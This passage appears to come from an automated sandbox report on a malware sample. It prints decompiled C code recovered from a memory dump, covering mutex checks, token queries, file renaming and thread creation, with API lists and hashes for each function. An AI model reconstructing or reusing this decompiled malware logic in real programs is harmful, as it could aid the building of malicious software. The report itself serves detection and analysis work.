                                                                                                                                                                                                						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							E00AF85FB( &_v12, _t16);
                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						L3:
                                                                                                                                                                                                						_t12 = 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                			}

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFB9F5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFB9FC
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,00AFBA79,?,00000000,?,00AFD0EA), ref: 00AFBA2B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2499131667-0
                                                                                                                                                                                                • Opcode ID: 67468438d72354df090625f5ac519e8db2bc12234980818f71fd98f1082df73b
                                                                                                                                                                                                • Instruction ID: 464435f0e0ba014c328f5bd01c5e98875d7b110865895c108dd38f0a137377d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67468438d72354df090625f5ac519e8db2bc12234980818f71fd98f1082df73b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7014F72610118BFCB30ABE5ED49DAB7EBCDB557A0B110565F606D3120EA31DD0096B0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF58FF(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t13 = __edx;
                                                                                                                                                                                                				if(__ecx != 0) {
                                                                                                                                                                                                					_t22 = 0;
                                                                                                                                                                                                					_t19 = CreateMutexA(0, 1, __ecx);
                                                                                                                                                                                                					if(_t19 != 0) {
                                                                                                                                                                                                						if(GetLastError() != 0xb7 || E00AFA501(_t19, _t13) != 0xffffffff) {
                                                                                                                                                                                                							_t22 = 1;
                                                                                                                                                                                                							 *_a4 = _t19;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t10 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                						_t22 = 0xffffffff;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t22 = _t21 | 0xffffffff;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t22;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,00AF59C0,00AF5DB5,Global,00B0BA14,?,00000000,?,00000002), ref: 00AF591B
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00AF59C0,00AF5DB5,Global,00B0BA14,?,00000000,?,00000002), ref: 00AF5927
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1925916568-0
                                                                                                                                                                                                • Opcode ID: 31a943e7bc896bd221406387a0d48fc13c52bdbce8bb2b64d31a838daa9a8213
                                                                                                                                                                                                • Instruction ID: e2f103723260619d294b7a59e4309532561da966f0a9f7faf986eb04197436e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31a943e7bc896bd221406387a0d48fc13c52bdbce8bb2b64d31a838daa9a8213
                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF0C831A04419DBCA1807F9D8C497A7AA8EFA5730B620325FB79D72D0CFB08C0543A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA4B3(CHAR* __ecx, void* __edx) {
                                                                                                                                                                                                				intOrPtr _t8;
                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t16 = __edx; // executed
                                                                                                                                                                                                				_t17 = CreateMutexA(0, 1, __ecx);
                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                					if(GetLastError() == 0xb7 && E00AFA501(_t17, _t16) < 0) {
                                                                                                                                                                                                						_t8 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                                                                                                                                                                                						_t17 = 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t17;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				GetLastError();
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}







                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00AF4E07,00000000), ref: 00AFA4C1
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFA4CD
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AFA4D7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$CreateMutex
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 200418032-0
                                                                                                                                                                                                • Opcode ID: 23df5429f30cbefd7468249a87321ed7bce15e179fdce911940477c443a60f6a
                                                                                                                                                                                                • Instruction ID: 12e718748db001a070270b0dca89852d0d96398acdfdc45150f053250b4be67b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23df5429f30cbefd7468249a87321ed7bce15e179fdce911940477c443a60f6a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F02B713001219BC71013A8FC0CFBA36A4AFB4712F024420F60DCB111DEB0CC4083A3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E00AFB054(void* __ecx, WCHAR* __edx) {
                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                				void _v528;
                                                                                                                                                                                                				char _v1046;
                                                                                                                                                                                                				void _v1048;
                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                				WCHAR* _t47;
                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                				_v8 = 0x104;
                                                                                                                                                                                                				_t47 = __edx;
                                                                                                                                                                                                				memset( &_v1048, 0, 0x208);
                                                                                                                                                                                                				memset( &_v528, 0, 0x208);
                                                                                                                                                                                                				_t21 =  *0xb0e698; // 0x4d3f9a0
                                                                                                                                                                                                				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                                                                                                                                                                                				_t49 = E00AFB988(_t39);
                                                                                                                                                                                                				_t26 =  *0xb0e6b8; // 0x4d3f9b0
                                                                                                                                                                                                				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                                                                                                                                                                                				if(_t27 == 0) {
                                                                                                                                                                                                					_t33 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					if(E00AFBBCF( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                                                                                                                                                                                						_t36 =  *0xb0e698; // 0x4d3f9a0
                                                                                                                                                                                                						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t40 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                                                                                                                                                                                				lstrcpynW(_t47,  &_v1046 + E00AFC3D4( &_v528) * 2, 0x104);
                                                                                                                                                                                                				return 1;
                                                                                                                                                                                                			}

















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB079
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB087
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetCurrentThread.KERNEL32 ref: 00AFB99B
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetLastError.KERNEL32(?,?,00AFBABE,74E5F500,10000000), ref: 00AFB9A9
                                                                                                                                                                                                  • Part of subcall function 00AFB988: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,00AFBABE,74E5F500,10000000), ref: 00AFB9C2
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 00AFB112
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Currentmemset$ErrorLastProcessThreadlstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4088293216-0
                                                                                                                                                                                                • Opcode ID: 533a5c61ec20644ede22e56ea95be781f491cf754ac7241af9ebe37542b76c6a
                                                                                                                                                                                                • Instruction ID: ce1f8e5597addb93be7d57315c613e8b8862225b2c31a9915c3b1579b0759f36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 533a5c61ec20644ede22e56ea95be781f491cf754ac7241af9ebe37542b76c6a
                                                                                                                                                                                                • Instruction Fuzzy Hash: F921AEB250111CAFE710EBA4DD89EEA77BCEB18304F0045A4F615D7192EB70DE88CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                			E00AF6D81(void* __eflags, void* __fp0) {
                                                                                                                                                                                                				short _v536;
                                                                                                                                                                                                				WCHAR* _v544;
                                                                                                                                                                                                				WCHAR* _t9;
                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                				WCHAR* _t59;
                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                				void* _t74;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t74 = __fp0;
                                                                                                                                                                                                				_t34 =  *0xb0e778; // 0x4d3f9f0
                                                                                                                                                                                                				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                                                                                                                                                                                                				_t51 = 0x31;
                                                                                                                                                                                                				_t32 = 1; // executed
                                                                                                                                                                                                				_t9 = E00AF9E9B(_t34, _t51); // executed
                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                					_t10 =  *0xb0e78c; // 0x0
                                                                                                                                                                                                					_t66 = _t10;
                                                                                                                                                                                                					if(_t10 == 0) {
                                                                                                                                                                                                						_t49 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_t10 = E00AFEE11(_t49 + 0xb0, _t51, _t66);
                                                                                                                                                                                                						 *0xb0e78c = _t10;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(_t10);
                                                                                                                                                                                                					_t11 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_push(L"\\c");
                                                                                                                                                                                                					_t9 = E00AF92C6(_t11 + 0x438);
                                                                                                                                                                                                					_t59 = _t9;
                                                                                                                                                                                                					_t63 = _t62 + 0x10;
                                                                                                                                                                                                					_v544 = _t59;
                                                                                                                                                                                                					if(_t59 != 0) {
                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                							_t35 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                							_t56 = E00AFA4B3(_t35 + 0x1878, 0x1388);
                                                                                                                                                                                                							if(_t56 == 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							if(E00AFB2AB(_t59) == 0) {
                                                                                                                                                                                                								_t32 = E00AFF191(_t59, 0x1388, _t74);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E00AFA51D(_t56);
                                                                                                                                                                                                							_t41 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                                                                                                                                                                                                							if(_t32 > 0) {
                                                                                                                                                                                                								E00AF97ED( &_v544);
                                                                                                                                                                                                								_t43 =  *0xb0e778; // 0x4d3f9f0
                                                                                                                                                                                                								_t53 = 0x33;
                                                                                                                                                                                                								if(E00AF9E9B(_t43, _t53) != 0) {
                                                                                                                                                                                                									L12:
                                                                                                                                                                                                									__eflags = E00AF1C51(_t59, __eflags, _t74);
                                                                                                                                                                                                									if(__eflags >= 0) {
                                                                                                                                                                                                										E00AFB1F3(_t59, _t53, __eflags, _t74);
                                                                                                                                                                                                										continue;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t46 =  *0xb0e778; // 0x4d3f9f0
                                                                                                                                                                                                									_t53 = 0x12;
                                                                                                                                                                                                									_t22 = E00AF9E9B(_t46, _t53);
                                                                                                                                                                                                									_t72 = _t22;
                                                                                                                                                                                                									if(_t22 != 0 || E00AFA531(_t53, _t72) != 0) {
                                                                                                                                                                                                										_push(E00AF97ED(0));
                                                                                                                                                                                                										E00AF9621( &_v536, 0x104, L"%s.%u", _t59);
                                                                                                                                                                                                										_t63 = _t63 + 0x14;
                                                                                                                                                                                                										MoveFileW(_t59,  &_v536);
                                                                                                                                                                                                										continue;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t9 = E00AF85FB( &_v544, 0xfffffffe);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t9;
                                                                                                                                                                                                			}
























                                                                                                                                                                                                0x00af6e65
                                                                                                                                                                                                0x00af6e77
                                                                                                                                                                                                0x00af6e88
                                                                                                                                                                                                0x00af6e8d
                                                                                                                                                                                                0x00af6e96
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6e65
                                                                                                                                                                                                0x00af6e53
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6e38
                                                                                                                                                                                                0x00af6ebf
                                                                                                                                                                                                0x00af6ec5
                                                                                                                                                                                                0x00af6deb
                                                                                                                                                                                                0x00af6ecc

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00AF6E96
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileMove
                                                                                                                                                                                                • String ID: %s.%u
                                                                                                                                                                                                • API String ID: 3562171763-1288070821
                                                                                                                                                                                                • Opcode ID: 3891c58923e11863444e57676516341af98df7c13958fe6260c354b324c7cfcc
                                                                                                                                                                                                • Instruction ID: a352572cb0120686c79d711dc406e906e4e454ffb915d5bde02a72f8c037e6cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3891c58923e11863444e57676516341af98df7c13958fe6260c354b324c7cfcc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31CF323043085BE614FBF5EE56ABF33A99BA4710F500928FB219B2D2EF24D905C752
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E00AF2ADD() {
                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                				CHAR* _v16;
                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                				signed int _t31;
                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                				CHAR* _t38;
                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t15 =  *0xb0e710 * 0x64;
                                                                                                                                                                                                				_t39 = 0;
                                                                                                                                                                                                				_v12 =  *0xb0e710 * 0x64;
                                                                                                                                                                                                				_t16 = E00AF85E5(_t15);
                                                                                                                                                                                                				_t38 = _t16;
                                                                                                                                                                                                				_v16 = _t38;
                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                					_t31 =  *0xb0e710; // 0x2
                                                                                                                                                                                                					_t36 = 0;
                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_push(_t38);
                                                                                                                                                                                                						E00AF9F13(0xe); // executed
                                                                                                                                                                                                						E00AF85FB( &_v16, _t39);
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t29 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t21 =  *0xb0e714; // 0x4d3ff48
                                                                                                                                                                                                						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                                                                                                                                                                                                							if(_t39 != 0) {
                                                                                                                                                                                                								lstrcatA(_t38, "|");
                                                                                                                                                                                                								_t39 = _t39 + 1;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t22 =  *0xb0e714; // 0x4d3ff48
                                                                                                                                                                                                							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                                                                                                                                                                                                							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                                                                                                                                                                                                							_t26 = E00AF95E2( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                                                                                                                                                                                                							_t31 =  *0xb0e710; // 0x2
                                                                                                                                                                                                							_t40 = _t40 + 0x18;
                                                                                                                                                                                                							_t36 = _v8;
                                                                                                                                                                                                							_t39 = _t39 + _t26;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t36 = _t36 + 1;
                                                                                                                                                                                                						_t29 = _t29 + 0x20;
                                                                                                                                                                                                						_v8 = _t36;
                                                                                                                                                                                                					} while (_t36 < _t31);
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t16 | 0xffffffff;
                                                                                                                                                                                                			}

















                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00B0B99C,00AF5731,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,00AF5731), ref: 00AF2B30
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeaplstrcat
                                                                                                                                                                                                • String ID: %u;%u;%u
                                                                                                                                                                                                • API String ID: 3011335133-2973439046
                                                                                                                                                                                                • Opcode ID: c324a48f56becb61e8b997a79b56900a1fc6eb19c7060e09008627dd3fec4bda
                                                                                                                                                                                                • Instruction ID: aebc2814021d7694a1ebb4f8e1b5e10b16e8d783f59d40e48fdf8124c77d6454
                                                                                                                                                                                                • Opcode Fuzzy Hash: c324a48f56becb61e8b997a79b56900a1fc6eb19c7060e09008627dd3fec4bda
                                                                                                                                                                                                • Instruction Fuzzy Hash: D3118132A00208ABDB15DFEDDD85E7A7BB9FB84310B1049A9FA25D71A1DF30D940CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AF98CF(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t58;
                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t73;
                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                				signed int _t92;
                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                				int _t106;
                                                                                                                                                                                                				intOrPtr _t110;
                                                                                                                                                                                                				signed int _t112;
                                                                                                                                                                                                				signed int _t113;
                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                				_t77 =  *0xb0e76c; // 0x39c
                                                                                                                                                                                                				_t73 = 0;
                                                                                                                                                                                                				if(E00AFA501(_t77, 0x7530) >= 0) {
                                                                                                                                                                                                					_t45 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                					_t112 = 0;
                                                                                                                                                                                                					_t106 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t78 =  *((intOrPtr*)(_t106 + _t45));
                                                                                                                                                                                                						if(_t78 == 0) {
                                                                                                                                                                                                							L6:
                                                                                                                                                                                                							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                                                                                                                                                                                                								_t113 = _t112 << 5;
                                                                                                                                                                                                								if(_v8 == _t73) {
                                                                                                                                                                                                									 *(_t113 + _t45 + 0x10) = _t73;
                                                                                                                                                                                                									_t46 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									 *(_t113 + _t46 + 0xc) = _t73;
                                                                                                                                                                                                									L14:
                                                                                                                                                                                                									_t79 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                                                                                                                                                                                                									_t48 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                                                                                                                                                                                                									_t49 = E00AFA4B3(0, 1);
                                                                                                                                                                                                									_t82 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                                                                                                                                                                                                									_t83 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									_t30 = _t83 + _t113 + 4; // 0x4d3417c
                                                                                                                                                                                                									_t52 = CreateThread(_t73, _t73, E00AF9887, _t83 + _t113, _t73, _t30);
                                                                                                                                                                                                									_t53 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									 *(_t113 + _t53) = _t52;
                                                                                                                                                                                                									_t54 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                									_t86 =  *(_t113 + _t54);
                                                                                                                                                                                                									if(_t86 != 0) {
                                                                                                                                                                                                										SetThreadPriority(_t86, 0xffffffff);
                                                                                                                                                                                                										_t87 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                										 *0xb0e774 =  *0xb0e774 + 1;
                                                                                                                                                                                                										E00AFA51D( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                                                                                                                                                                                                										_t74 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                										_t73 = _t74 + _t113;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t59 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                                                                                                                                                                                                										_t61 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                										_t37 = _t61 + 0xc; // 0x4d34184
                                                                                                                                                                                                										_t91 = _t37 + _t113;
                                                                                                                                                                                                										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                                                                                                                                                                                                											E00AF85FB(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                                                                                                                                                                                                											_t61 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t92 = 8;
                                                                                                                                                                                                										memset(_t113 + _t61, 0, _t92 << 2);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									L19:
                                                                                                                                                                                                									_t89 =  *0xb0e76c; // 0x39c
                                                                                                                                                                                                									E00AFA51D(_t89);
                                                                                                                                                                                                									_t58 = _t73;
                                                                                                                                                                                                									L20:
                                                                                                                                                                                                									return _t58;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t110 = _a4;
                                                                                                                                                                                                								_t65 = E00AF85E5(_t110);
                                                                                                                                                                                                								_t97 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                                                                                                                                                                                                								_t66 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                                                                                                                                                                                                									goto L19;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                                                                                                                                                                                                								_t67 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                								E00AF86C2( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                                                                                                                                                                                                								_t115 = _t115 + 0xc;
                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t69 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						_push(_t73);
                                                                                                                                                                                                						_push(_t78);
                                                                                                                                                                                                						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                                                                                                                                                                                                							_t45 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t98 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                						E00AF982B(_t106 + _t98, 0);
                                                                                                                                                                                                						_t45 =  *0xb0e770; // 0x4d34178
                                                                                                                                                                                                						goto L6;
